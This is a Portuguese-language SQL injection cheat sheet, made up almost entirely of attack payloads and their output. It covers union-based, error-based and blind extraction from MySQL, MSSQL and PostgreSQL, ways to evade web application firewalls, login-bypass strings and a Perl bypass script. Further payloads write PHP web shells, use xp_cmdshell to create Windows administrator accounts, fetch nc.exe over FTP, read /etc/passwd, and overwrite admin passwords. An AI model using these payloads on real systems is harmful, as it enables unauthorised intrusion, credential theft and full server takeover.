http://www.site.com/buy.php?id=1' http://www.site.com/buy.php?id='1 http://www.site.com/buy.php?id=-1' http://www.site.com/buy.php?id=1`
http://www.site.com/buy.php?id='1&dog;catid='2
http://www.site.com/buy.php?id=1 order by 1-- <-- sem erro http://www.site.com/buy.php?id=1 order by 2-- <-- sem erro http://www.site.com/buy.php?id=1 order by 3-- <-- sem erro http://www.site.com/buy.php?id=1 order by 4-- <-- sem erro http://www.site.com/buy.php?id=1 order by 5-- <-- com erro
http://www.site.com/buy.php?id=1 order by 1/ http://www.site.com/buy.php?id=1 order by 1 http://www.site.com/buy.php?id=1 order by 1--
http://www.site.com/buy.php?id=1+order+by+1-- http://www.site.com/buy.php?id=1%20order%20by%201-- http://www.site.com/buy.php?id=1 order by 1
--> http://www.site.com/dir/accountlevel?id=1032%00' --> http://www.site.com/dir/accountlevel?id=1032%27 --> http://www.site.com/dir/accountlevel?id=1032%00%27%00 --> http://www.site.com/dir/accountlevel?id=%271032%00 --> http://www.site.com/dir/accountlevel?id=%00%00%2710325%00
--> site.com/news.php?id=9 order by 10000000000-- [Sem Erro]
--> site.com/news.php?id=9' order by 10000000--+ [Com Erro]
--> http://site.com/news.php?id=-9' union select 1,2,3,4,5,6,7,8--+
http://www.site.com/buy.php?id=1 union select 1,2,3,4-- http://www.site.com/buy.php?id=1 union all select 1,2,3,4--
http://www.site.com/index.php?id=-1+union+select+1,2,3,4,5--
("404 forbidden you do not have permission to access to this webpage")
http://www.site.com/index.php?id=-1+/*!UnIoN*/+/*!sELeCt*/1,2,3,4,5--
http://www.site.com/buy.php?id=1 union select 1,2,@@version,4-- <-- Mostra a versão
http://www.site.com/buy.php?id=1 union select 1,2,version(),4-- <-- Mostra a versão
http://www.site.com/buy.php?id=1 union select 1,2,@@hostname,4-- <-- Mostra o hostname
http://www.site.com/buy.php?id=1 union select 1,2,user(),3,4-- <-- Mostra o user
http://www.site.com/buy.php?id=1 union select 1,2,database(),3,4-- <-- Mostra a current-db
http://www.site.com/buy.php?id=1 union select 1,2,@@datadir,3,4-- <-- Mostra o DIR do mysql
http://www.site.com/buy.php?id=1 union select 1,2,group_concat(version(),user(),@@hostaname,@@datadir),3,4
http://www.site.com/buy.php?id=1 union select 1,2,group_concat(version(),0x3a,user(),0x3a,@@hostaname,0x3a,@@datadir),3,4--
http://www.site.com/buy.php?id=-1 UNION SELECT 1,2,unhex(hex(@@version)),4--
http://www.site.com/buy.php?id=-1 union select 1,2,group_concat(schema_name),4 from information_schema.schemata--
http://www.site.com/buy.php?id=-1 union select 1,2,group_concat(database()),4-- http://www.site.com/buy.php?id=-1 union select 1,2,concat(database()),4-- http://www.site.com/buy.php?id=-1 union select 1,2,database(),4--
http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()--
http://www.site.com/buy.php?id=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1-- http://www.site.com/buy.php?id=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 15,1-- http://www.site.com/buy.php?id=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 30,1-- http://www.site.com/buy.php?id=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 45,1--
http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name="nomedatabela"--
http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=0x6e6f6d656461746162656c61--
http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=CHAR(97, 100, 109, 105, 110)--
http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(user,0x3a,pass,0x3a,email),3,4 FROM admin--
+and(select+1+FROM(select count(*),concat((select(select concat (version())) FROM Information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
+and(select+1+FROM(select count(*),concat((select(select concat (database())) FROM Information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
+and(select+1+FROM(select count(*),concat((select(select (SELECT concat (0x7e,0x27,count(table_name),0x27,0x7e) FROM 'Information_schema'.tables WHERE table_schema=AQUI VC COLOCA O NOME DA DB EM HEX)) LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
admin = 0x61646d696e
+and(select+1+FROM(select count(*),concat((select(select (SELECT concat (0x7e,0x27,count(table_name),0x27,0x7e) FROM 'Information_schema'.tables WHERE table_schema=0x61646d696e)) LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
+and(select+1+FROM(select count(*),concat((select(select (SELECT concat (0x7e,0x27,count(table_name),0x27,0x7e) FROM 'Information_schema'.tables WHERE table_schema=0x61646d696e AND table_name=0x65321233e)) LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
+and(select+1+FROM(select count(*),concat((select+concat(0x3a,password)+from+users+LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
http://site.com/index.php?id=1+and(select+1+FROM(select count(*),concat((select+concat(0x3a,username)+from+users+LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
WAF significa Web Application Firewall. É amplamente utilizado hoje em dia para detectar e defender ataques de SQL Injections e Cross Site Scripting (XSS).
Quando WAF detecta qualquer entrada malicioso de usuário final, dá 403 Proibido, 406 Não Aceitável ou qualquer tipo de erros personalizados.
Então, o que fazer a seguir? nós não podemos fazer a injeção normal correto? Bem, é hora de usar várias técnicas de bypass.
A maioria dos Waf's filtram apenas letras minusculas ou palavras chaves do WAF. Podemos facilmente fugir desse tipo de WAFS usando caso alternativo.
Se union select é proibido , podemos testar então UNION SELECT. E se ambos não funcionarem, podemos tentar misturar ambos. Assim: UniOn seLeCt
Comentários SQL realmente nos ajudam em varias situações. Eles desempenham o seu papel importante na morte de Restrições de alguns Waf.
Alguns WAF’s filtram palavras como /union\sselect/ig Podemos ignorar esses filtros usando comentários incorporados na maioria das vezes.
http://localhost/waf.php?id=1 /*!union*/ /*!select*/ 1,2,3--
De qualquer forma, estávamos falando sobre palavras-chave filtradas. Então, isso não significa que waf só está filtrando union select. Talvez esteja filtrando todas palavras chaves de SQL como table_name, column_name etc Então, talvez seja necessário aplicar esses comentários na linha sobre as palavras-chave também.
http://localhost/waf.php?id=1 /*!union*/ /*!select*/ 1,2,/*!table_name*/,4,5 /*!from*/ /*!information_schema.tables*/ /*!where*/ /*!table_schema*/=database()--
As vezes WAF remove toda palavra-chave da consulta e executa como erro.
http://localhost/waf.php?id=1 UNunionION SELselectECT 1,2,3,4,5,6--
De qualquer forma depende do cenário. Eu estou apenas dando uma idéia comum. O resto é com você a forma como você vai usar depende apenas de você.
As vezes Waf pode filtrar o espaço em branco que estamos usando entre palavras-chave. Na maioria das vezes usamos o espaços, mas o espaço não é o único espaço em branco que podemos usar na injeção SQL. Temos algumas outras opções também por exemplo: o + e o %20 são usados como espaço ,mais exemplos são: %09 %0A %0B %0C %0D **%A0*
union%0Bselect%0B1,2,3--
union select 1,/*!table_name*/,3 from information_schema.tables where table_schema=database()
union%20select%201,%2f%2a%21table_name%2a%2f,3%20from%20information_schema.tables%20where%20table_schema%3Ddatabase%28%29
union%2520select%25201,%2f%2a%21table_name%2a%2f%2520,3 from%2520information_schema.tables%2520where%2520table_schema%253Ddatabase%2528%2529
http://localhost/waf.php?id=1 and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA) union select 1,2,3,4,5--
%55nion(%53elect 1,2,3)-- - +union+distinct+select+ +union+distinctROW+select+ ///*!12345UNION SELECT*/// ///*!50000UNION SELECT*/// //UNION///*!50000SELECT*//**/ /*!50000UniON SeLeCt*/ union /*!50000%53elect*/ +#uNiOn+#sEleCt +#1q%0AuNiOn all#qa%0A#%0AsEleCt /*!%55NiOn*/ /*!%53eLEct*/ /*!u%6eion*/ /*!se%6cect*/ +un//ion+se//lect uni%0bon+se%0blect %2f%2funion%2f%2fselect union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A REVERSE(noinu)+REVERSE(tceles) /*--*/union/*--*/select/*--*/ union (/*!/**/ SeleCT */ 1,2,3) /*!union*/+/*!select*/ union+/*!select*/ //union//select/**/ //uNIon//sEleCt/**/ ///*!union*////*!select*//**/ /*!uNIOn*/ /*!SelECt*/ +union+distinct+select+ +union+distinctROW+select+ uNiOn aLl sElEcT
/*!union*/ /*!select*/ 1,2,3,4,5--
http://www.site.com.br/index.php?id=15 /*!union*/ /*!select*/ 1,2,3,4,5#continue xploiting....
http://www.site.com.br/index.php?id=15 UnIoN SeLeCT 1,2,3,4,5#continue xploiting...
http://www.site.com.br/index.php?id=15 /*!uNIOn*/ /*!SelECt*/ 1,2,3,4,5#continue xploiting...
http://www.site.com.br/index.php?id=15 UNIunionON SELselectECT 1,2,3,4,5#continue xploiting...
http://www.site.com.br/index.php?id=15 UnION/**/SElecT 1,2,3,4,5#continue xploiting...
+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4,5#continue xploiting...
http://www.site.com.br/index.php?id=15+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4,5
/*!union*/ /*!select*/ 1,2,3,4,5
- Hex Encoded for URL: %2f%2a%21%75%6e%69%6f%6e%2a%2f%20%2f%2a%21%73%65%6c%65%63%74%2a%2f%20%31%2c%32%2c%33%2c%34%2c%35
- Hex Dashed: 2f-2a-21-75-6e-69-6f-6e-2a-2f-20-2f-2a-21-73-65-6c-65-63-74-2a-2f-20-31-2c-32-2c-33-2c-34-2c-35
- Hex Spaced: 2f 2a 21 75 6e 69 6f 6e 2a 2f 20 2f 2a 21 73 65 6c 65 63 74 2a 2f 20 31 2c 32 2c 33 2c 34 2c 35
- Hex: 2f2a21756e696f6e2a2f202f2a2173656c6563742a2f20312c322c332c342c35
/*!u%6eion*/ /*!se%6cect*/ 1,2,3,4,5...
/*!union*/ /*!select*/ 1,2,3,4,5...
+-------------------------------+ | COMUM ++++++ ALTERNATIVO | | | | |@@version | version() | |concat() | concat_ws() | |group_concat() | concat_ws() | +-------------------------------+
http://www.site.com.br/index.php?id=15+uni*on+sel*ect+1,2,3,4,5#continue xploiting...
http://www.site.com.br/index.php?id=15+union+select+1,2,3,4,5#continue xploiting...
http://www.site.com.br/index.php?id=15+(uNioN)+(sElECt)1,2,3,4,5#continue xploiting....
http://www.site.com.br/index.php?id=15+(uNioN+SeleCT)+1,2,3,4,5#continue xploiting....
http://www.site.com.br/index.php?id=15+(UnI)(oN)+(SeL)(ecT)+1,2,3,4,5#continue xploiting....
http://www.site.com.br/index.php?id=15+union (select 1,2,3,4,5)#continue xploiting....
Illegal Mix of Collation
Union Illegal Mix of Collation
Cast(): Cast(Expressão AS Tipo) Cast(@@version,0x3a,database() AS binary) Cast(@@version AS binary) convert(): convert(@@version using ascii) HEX/ UNHEX(): unhex(hex(@@version,0x3a,database())) unhex(hex(version())) Compress/uncompress: uncompress(compress(@@version)) uncompress(compress(version())) encode/decode: decode(encode(@@version,1),1) decode(encode(version(),1),1) Encriptação AES: AES_DECRYPT(AES_ESCRYPT(@@version,1),1) AES_DECRYPT(AES_ESCRYPT(version(),1),1)
/?id=1+un//ion+sel//ect+1,2,3--
union+select+1,2,3--
/?id=1;union+select+pwd+from+users--
/?id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users
id=1/**/union/*,*/select/*,*/pwd/*,*/from/*,*/users (QUERY VALIDA)
Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']); Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']." limit ".$_GET['c']);
/?a=1+union/*&b=*/select+1,2 /?a=1+union/*&b=*/select+1,pass/*&c=*/from+users--
select * from table where a=1 union/* and b=*/select 1,2 select * from table where a=1 union/* and b=*/select 1,pass/* limit */from users--
substring() -> mid(), substr(), etc ascii() -> hex(), bin(), etc benchmark() -> sleep()
select user from mysql.user where user = 'user' OR mid(password,1,1)='*' select user from mysql.user where user = 'user' OR mid(password,1,1)=0x2a select user from mysql.user where user = 'user' OR mid(password,1,1)=unhex('2a') select user from mysql.user where user = 'user' OR mid(password,1,1) regexp '[*]' select user from mysql.user where user = 'user' OR mid(password,1,1) like '*' select user from mysql.user where user = 'user' OR mid(password,1,1) rlike '[*]' select user from mysql.user where user = 'user' OR ord(mid(password,1,1))=42 select user from mysql.user where user = 'user' OR ascii(mid(password,1,1))=42 select user from mysql.user where user = 'user' OR find_in_set('2a',hex(mid(password,1,1)))=1 select user from mysql.user where user = 'user' OR position(0x2a in password)=1 select user from mysql.user where user = 'user' OR locate(0x2a,password)=1 select user from mysql.user where user = 'user' OR substr(password,1,1)=0x2a select user from mysql.user where user = 'user' OR substring(password,1,1)=0x2a
substring((select 'password'),1,1) = 0x70 substr((select 'password'),1,1) = 0x70 mid((select 'password'),1,1) = 0x70
strcmp(left('password',1), 0x69) = 1 (TRUE para 1,se password password é maior que 0x71 [NUMERAÇÃO ASCII]) strcmp(left('password',1), 0x70) = 0 (TRUE para 0, se password e 0x70 são iguais strcmp(left('password',1), 0x71) = -1(TRUE para -1, se password é menor que 0x71 [NUMERAÇÃO ASCII])
false: index.php?uid=strcmp(left((select+hash+from+users+limit+0,1),1),0x42)%2B112233 false: index.php?uid=strcmp(left((select+hash+from+users+limit+0,1),1),0x61)%2B112233 true: index.php?uid=strcmp(left((select+hash+from+users+limit+0,1),1),0x62)%2B112233 Primeiro caractere da hash é = B false: index.php?uid=strcmp(left((select//hash//from//users//limit/**/0,1),2),0x6240)%2B112233 true: index.php?uid=strcmp(left((select//hash//from//users//limit/**/0,1),2),0x6241)%2B112233 Segundo caractere da hash é = A
and 1 or 1 and 1=1 and 2<3 and 'a'='a' and 'a'<>'b' and char(32)=' ' and 3<=2 and 5<=>4 and 5<=>5 and 5 is null or 5 is not null
Forbid: /?id=1+union+select+user,password+from+mysql.user+where+user=1 But allows: /?id=1+union+select+user,password+from+mysql.user+limit+0,1
Forbid: /?id=1+OR+1=1 But allows: /?id=1+OR+0x50=0x50
Forbid: /?id=substring((1),1,1) But allows: /?id=mid((1),1,1)
Forbid:/?id=1+and+ascii(lower(substring((select+pwd+from+users+limit+1,1),1,1)))=74 But allows:/?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74
Forbid: /?id=1+and+5=6 But allows: /?id=1+and+5!=6
Forbid: /?id=1;drop members But allows: /?id=1;delete members
Microsoft OLE DB Provider for SQL Server error '80040e14' Unclosed quotation mark after the ID integer '5' '. index.asp, line 30
www.target.com/index.asp?id=1 and 1=1-- Carrega normal
www.target.com/index.asp?id=1 and 1=2-- Mssql Erro
Se 1=2 carregar perfeito pode ser necessario usar (string) '+and+1=1--+-
+and+1=convert(int,@@version)--
www.target.com/index.asp?id=1'+and+1=convert(int,@@version)--
+and+1=convert(int,db_name())--
www.target.com/index.asp?id=1'+and+1=convert(int,db_name())--
'+and+1=convert(int,user_name())--
www.target.com/index.asp?id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables))--+-
+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in('table1')))--
www.target.com/index.asp?id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in('table1')))--
www.target.com/index.asp?id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in('table1','table2')))--
+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='table1'))--
www.target.com/index.asp?id=1+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='table1'))--
Microsoft OLE DB Provider for SQL Server error '80040e07' Conversion failed when converting the nvarchar value 'username' to data type int. index.asp, line 30
+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='table1'+and+column_name+not+in+('username')))--
www.target.com/index.asp?id=1'+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='table1'+and+column_name+not+in+('username')))--
+and+1=convert(int,(select+top+1+username+from+table1))--
Microsoft OLE DB Provider for SQL Server error '80040e07' Conversion failed when converting the nvarchar value 'admin@site' to data type int. index.asp, line 30
+and+1=convert(int,(select+top+1+password+from+table1))--
www.target.com/index.asp?id=1'+and+1=convert(int,(select+top+1+username+from+table1))--
Microsoft OLE DB Provider for SQL Server error '80040e07' Conversion failed when converting the nvarchar value 'adminPass123' to data type int. index.asp, line 30
select load_file(nome_do_arquivo_em_hex_0x61)
select '<?php phpinfo(); ?>' INTO OUTFILE '/home/site/public_html/out.php'
set tabela update coluna='novo_valor'
http://site.com/index.php?option=com_user&view=reset
http://site.com/index.php?option=com_user&view=reset&layout=confirm
http://site.com/wp-login.php?action=lostpassword
http://site.com/wp-login.php?action=rp&key=Coloque seu codigo de ativação aqui&login=Coloque o referente user aqui
---------------------------------------- Username | ' or 1='1 | | | ---------------------------------------- ---------------------------------------- Password | xxxxxxxxx | | | ----------------------------------------
' or 1='1 <--- mais usada hi ‘ ou 1=1 – hi ‘ ou ‘ a’='a hi ‘) ou (‘ a’='a hi”) ou (“a”=”a admin ‘ – - ‘ ou 0=0 – “ou 0=0 – ou 0=0 – ‘ or ‘ 1 b’ or ‘ 1=’ ‘ or ’1 ‘ or ‘| ‘ or ‘a’='a ‘ or ”=’ ‘ or 1=1– ‘) or (‘a’='a ‘ or ’1′=’1 ‘ ou 0=0 # “ou 0=0 # ou 0=0 # ‘ ou ‘ x’='x “ou” x”=”x ‘) ou (‘ x’='x “ou” a”=”a ‘) ou (‘ a’='a “) ou (“a”=”a hi “ou” a”=”a hi “ou 1=1 – ‘ ou 1=1 – “ou 1=1 – ou 1=1 – ‘ ou a=a – ‘ ou 1=1 – “ou 1=1 – ou 1=1 – ‘ ou a=a –
#!/usr/bin/env perl use common::sense; use WWW::Curl::Easy; sub cURL { my ( $url, $header, $post ) = @_; my $curl = WWW::Curl::Easy->new; $curl->setopt( CURLOPT_HEADER, $header // 0 ); $curl->setopt( CURLOPT_NOBODY, $header // 0 ); $curl->setopt( CURLOPT_URL, $url ); if(defined $post) { $curl->setopt( CURLOPT_CUSTOMREQUEST, $post ? 'POST' : 'GET' ); $curl->setopt( CURLOPT_POST, 1 ); $curl->setopt( CURLOPT_POSTFIELDS, $post ); } my $r; $curl->setopt( CURLOPT_WRITEDATA, $r ); return ( $curl->perform == 0 ) ? $r : 0; } my $xpl = '\' or \'1\'=\'1'; $xpl =~ s/x27/chr(0xbf).chr(0x27)/ge; say cURL('http://site.com/admin', 1, 'user=site&passwd=' . $xpl);
http://site.com/admin.asp?user=site$passwd=%bf%27'or%20'1='1
http://site.com/admin.asp?max=0+and+sleep(15)
Site vul: www.site.com/vul.asp?id=1'
Mcft OLE DB Provider for ODBC Drivers error '80040e14' [Mcft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''.
Url:http://site.com/vul.asp?id=system_user--
[Mcft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'sa' to a column of data type int.
Url:http://site.com/vul.asp?id=1;drop table sin create table sin (id int identity,nd varchar(1000)) insert into sin exec master..xp_cmdshell 'ip config'--sp_password
Url:http://site.com/vul.asp?id=convert(int,(select top 1 nd from sin where id=1)) --sp_password
Mcft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the varchar value ' ' to a column of data type int.
Mcft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the varchar value ' IP Address. . . . . . . . . . . . : xxx.xxx.xxx.xxx ' to a column of data type int.* Feito isto utilizamos um port scan para verificar quais portas estão abertas: *root@CyberHats:~# nmap xxx.xxx.xxx.xxx Discovered open port 21/tcp on xxx.xxx.xxx.xxx Discovered open port 443/tcp on xxx.xxx.xxx.xxx Discovered open port 80/tcp on xxx.xxx.xxx.xxx Discovered open port 3389/tcp on xxx.xxx.xxx.xxx
Url:http://site.com/vul.asp?id=1;exec master..xp_cmdshell 'net user sin 123456 /add'--sp_password;exec master..xp_cmdshell 'net localgroup administrators sin /add'--sp_password
http://site.com/vul.asp?id=exec master..xp_cmdshell 'echo open ftp.site.com > c:\ftp' --sp_password;exec master..xp_cmdshell 'echo user username >> c:\ftp'--sp_password;exec master..xp_cmdshell 'echo password >> c:\ftp'--sp_password;exec master..xp_cmdshell 'echo get nc.exe >> c:\ftp'--sp_password;exec master..xp_cmdshell 'echo quit >> c:\ftp'--sp_password;exec master..xp_cmdshell 'ftp -i -n -v -s:c:\ftp'--sp_password;exec master..xp_cmdshell 'del c:\ftp'--sp_password
root@CyberHats:~# telnet xxx.xxxxxxxxxx.xxx.xx 80 Trying xxx.xxx.xxx.xxx... Connected to xxx.xxx.xxx.xxx. Escape character is '^]'. GET /index.php HTTP/1.1 Host: xxx.xxxxxxxxxx.xxx.xx User-Agent: ' union select 1-- --
user_session=ckjs34fsdkj455ygdman3:language_id=1
root@CyberHats:~# telnet xxx.xxxxxxxxxx.xxx.xx 80 Trying xxx.xxx.xxx.xxx... Connected to xxx.xxx.xxx.xxx. Escape character is '^]'. GET / HTTP/1.1 Connection: Keep-Alive Keep-Alive: 300 Accept: / Host: xxx.xxx.xxx.xxx Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16 ( .NET CLR 3.5.30729; .NET4.0E) Cookie: user_session=ckjs34fsdkj455ygdman3:language_id=1 ' union select 1-- -- <-- aqui tu manda os comandos ;)
root@CyberHats:~# telnet xxx.xxxxxxxxxx.xxx.xx 80 Trying xxx.xxx.xxx.xxx... Connected to xxx.xxx.xxx.xxx. Escape character is '^]'. GET /admin/index.php HTTP/1.1 Host: xxx.xxx.xxx.xxx X_FORWARDED_FOR :127.0.0.1' or 1=1#
root@CyberHats:~# telnet xxx.xxxxxxxxxx.xxx.xx 80 Trying xxx.xxx.xxx.xxx... Connected to xxx.xxx.xxx.xxx. Escape character is '^]'. GET /admin/index.php HTTP/1.1 Host: xxx.xxx.xxx.xxx X_FORWARDED_FOR :127.0.0.1'+and+0+order+by+1--+#
Table:admin_login Columns: +-----------+ | id | | login | | senha | +-----------+
http://site.com/index.php?id=1; INSERT INTO admin_login (id,login,senha) values ('10','admin2','21232f297a57a5a743894a0e4a801fc3')-- ~~> com a senha encriptada em MD5
http://site.com/index.php?id=1; INSERT INTO admin_login (id,login,senha) values ('10','admin2','admin')-- ~~> com a senha em texto comum
ID do administrador
Tabela dos logins (Ex:admin_login)
colunas da tabela dos logins (Ex:
+-----------+---------------------------------+ | id | 1 | | login | admin | | senha | 21232f297a57a5a743894a0e4a801fc3| +-----------+---------------------------------+
http://site.com/index.php?id=1; UPDATE admin_login set login='admin',senha='21232f297a57a5a743894a0e4a801fc3' where id=1--
http://site.com/index.php?id=1; UPDATE admin_login set login='admin',senha='admin' where id=1--
http://site.com/index.php?id=1; UPDATE admin_login set senha='21232f297a57a5a743894a0e4a801fc3' where id=1--
select file_priv from mysql.user where user='username' --> onde username deve ser encriptado em Hex (estou usando para isto a hack bar)
http://www.site.com/index.php?id=-1+union+select+1,group_concat(file_priv)+from+mysql.user where user=0x637365
user=0x637365 == user=username
http://www.site.com/index.php?id=-1+union+select+1,group_concat(user,0x3a,file_priv),3,4+from+mysql.user--
SELECT 'CODIGO PEQUENO DA SHELL AQUI ' INTO OUTFILE '/var/www/webshell.php'
http://www.site.com/index.php?id=1 union select 1,"<?php system($_REQUEST['cmd'])?>",3,4 INTO OUTFILE " /var/www/webshell.php "
http://www.site.com/webshell.php?cmd=wget www.site.com/suashell.txt; mv suashell.txt shell.php
+union+select+1,LOAD_FILE(0x2f6574632f706173737764)-- /(CODIFICAÇÃO EM HEX)/
+union+select+1,LOAD_FILE(CHAR(47, 101, 116, 99, 47, 112, 97, 115, 115, 119, 100))-- /(CODIFICAÇÃO EM CHAR)/
http://www.site.com/weshell.php?cmd=net users
http://www.site.com/weshell.php?cmd=net user cyberhats/add
http://www.site.com/weshell.php?cmd=net localgroup administrators cyberhats/add
http://www.site.com/index.php?id=MTU=
http://www.site.com/index.php?id=MTU='
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax ..... (VULNERÁVEL)
group by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50
MTUrZ3JvdXAgYnkgIDEsMiwzLDQsNSw2LDcsOCw5LDEwLDExLDEyLDEzLDE0LDE1LDE2LDE3LDE4LDE5LDIwLDIxLDIyLDIzLDI0LDI1LDI2LDI3LDI4LDI5LDMwLDMxLDMyLDMzLDM0LDM1LDM2LDM3LDM4LDM5LDQwLDQxLDQyLDQzLDQ0LDQ1LDQ2LDQ3LDQ4LDQ5LDUw=
http://www.site.com/index.php?id=MTUrZ3JvdXAgYnkgIDEsMiwzLDQsNSw2LDcsOCw5LDEwLDExLDEyLDEzLDE0LDE1LDE2LDE3LDE4LDE5LDIwLDIxLDIyLDIzLDI0LDI1LDI2LDI3LDI4LDI5LDMwLDMxLDMyLDMzLDM0LDM1LDM2LDM3LDM4LDM5LDQwLDQxLDQyLDQzLDQ0LDQ1LDQ2LDQ3LDQ4LDQ5LDUw=
Unknow column '11'* --> Ou seja, o site possue 10 colunas (sempre uma anterior ao resultado exibido, pois o erro ocorreu em 11,ou seja ela não existe.) 4- Verificando qual coluna está vulnerável: *UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
http://www.site.com/index.php?id=MTUrVU5JT04gU0VMRUNUIDEsMiwzLDQsNSw2LDcsOCw5LDEwLDExLDEyLDEzLDE0LDE1=
http://www.site.com/index.php?id=15+/*!12345UnIon*/+/*!12345SelEct*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
MTUrLyohMTIzNDVVbklvbiovKy8qITEyMzQ1U2VsRWN0Ki8rMSwyLDMsNCw1LDYsNyw4LDksMTAsMTEsMTIsMTMsMTQsMTU=
http://www.site.com/index.php?id=MTUrLyohMTIzNDVVbklvbiovKy8qITEyMzQ1U2VsRWN0Ki8rMSwyLDMsNCw1LDYsNyw4LDksMTAsMTEsMTIsMTMsMTQsMTU=
or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--
and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit N,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit N,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0xTABLEHEX limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
users ==> 7573657273
and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x7573657273 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x7573657273 limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
and (select 1 from (select count(*),concat((select(select concat(cast(concat(COLUMN_NAME_1,0x7e,COLUMN_NAME_2) as char),0x7e)) from DATABASENAME.TABLENAME limit N,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
COLUMN_NAME_1 && COLUMN_NAME_2 admin && senha
DATABASENAME site_db TABLENAME users limit N,1 1,1
and (select 1 from (select count(*),concat((select(select concat(cast(concat(admin,0x3a,senha) as char),0x3a)) from site_db.users limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
http://www.site.com/code?id=10' ERROR !
order by 1-- NO ERROR order by 2-- N0 ERROR order by 3-- ERRO !!!
http://www.site.com/code?id=10 union select NULL,NULL <-- se ir normal é porque não é based error e é postgresql.
http://www.site.com/code?id=10 union select NULL,VERSION()
http://www.site.com/code?id=-10 union select NULL,VERSION()
http://www.site.com/code?id=-10 union select NULL,CURRENT_DATABASE()
http://www.site.com/code?id=-10 union select NULL,datname from pg_database
http://www.site.com/code?id=-10 union select NULL,tablename from pg_tables where schemaname='NOME_DA_DATABASE'
http://www.site.com/code?id=-10 union select NULL,column_name from information_schema.columns where table_name='NOME_DA_TABELA'
http://www.site.com/code?id=-10 union select NULL,COLUNM1||':'||COLUNM2||':'||COLUNM3 from DB_NAME.TABLE_NAME
Copy(select '<?php system($_REQUEST['cmd']);?>') to 'C:\www\site\shell.php';
http://www.site.com/code?id=-10 union select NULL,COLUNM1||':'||COLUNM2||':'||COLUNM3 from DB_NAME.TABLE_NAME;Copy(select '<?php system($_REQUEST['cmd']);?>') to 'C:\www\site\shell.php';
http://www.site.com/code.php?id=10 and 1=cast((select version())::text as int)--
http://www.site.com/code.php?id=10 and 1=cast( (CHR(60)) ||(select count(*) from information_schema.schemata)::text as int)--
http://www.site.com/code.php?id=10 and 1=cast((select current_schema())::text as int)--
http://www.site.com/code.php?id=10 and 1=cast((select schema_name from information_schema.schemata limit 1 offset 0)::text as int)--
